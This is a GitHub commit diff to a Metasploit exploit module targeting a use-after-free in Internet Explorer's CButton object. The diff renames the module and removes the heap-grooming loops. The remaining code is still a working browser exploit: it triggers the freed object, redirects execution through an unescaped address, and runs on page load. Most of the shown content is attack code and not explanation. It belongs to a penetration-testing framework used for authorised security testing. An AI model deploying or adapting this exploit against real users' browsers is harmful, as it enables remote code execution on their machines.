Skip to content

Commit f7543e1

Browse files
sinn3rsinn3r
committed
Your def of commit apparently is a little different than mine, git.
1 parent 2b3f7c4 commit f7543e1

File tree

1 file changed

+3
-34
lines changed

1 file changed

+3
-34
lines changed

modules/exploits/windows/browser/ie_cbutton_uaf.rb

Lines changed: 3 additions & 34 deletions
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
1515

1616
def initialize(info={})
1717
super(update_info(info,
18-
'Name' => "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability",
18+
'Name' => "Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability",
1919
'Description' => %q{
2020
This module exploits a vulnerability found in Microsoft Internet Explorer. A
2121
use-after-free condition occurs when a CButton object is freed, but a reference
@@ -187,37 +187,11 @@ def load_exploit_html(my_target, cli)
187187
<script>
188188
#{js}
189189
190-
function exploit()
190+
function helloWorld()
191191
{
192192
var e0 = null;
193193
var e1 = null;
194194
var e2 = null;
195-
var arrObject = new Array(3000);
196-
var elmObject = new Array(500);
197-
for (var i = 0; i < arrObject.length; i++)
198-
{
199-
arrObject[i] = document.createElement('div');
200-
arrObject[i].className = unescape("ababababababababababababababababababababa");
201-
}
202-
203-
for (var i = 0; i < arrObject.length; i += 2)
204-
{
205-
arrObject[i].className = null;
206-
}
207-
208-
CollectGarbage();
209-
210-
for (var i = 0; i < elmObject.length; i ++)
211-
{
212-
elmObject[i] = document.createElement('button');
213-
}
214-
215-
for (var i = 1; i < arrObject.length; i += 2)
216-
{
217-
arrObject[i].className = null;
218-
}
219-
220-
CollectGarbage();
221195
222196
try {
223197
e0 = document.getElementById("a");
@@ -230,19 +204,14 @@ def load_exploit_html(my_target, cli)
230204
e2.appendChild(document.createElement('body'));
231205
} catch(e) { }
232206
CollectGarbage();
233-
for(var i =0; i < 20; i++)
234-
{
235-
arrObject[i].className = unescape("ababababababababababababababababababababa");
236-
}
237207
var eip = window;
238208
var data = "#{Rex::Text.rand_text_alpha(41)}";
239209
eip.location = unescape("%u0b30%u0c0c" + data);
240-
241210
}
242211
243212
</script>
244213
</head>
245-
<body onload="eval(exploit())">
214+
<body onload="eval(helloWorld())">
246215
<form id="a">
247216
</form>
248217
<dfn id="b">

0 commit comments

Comments
 (0)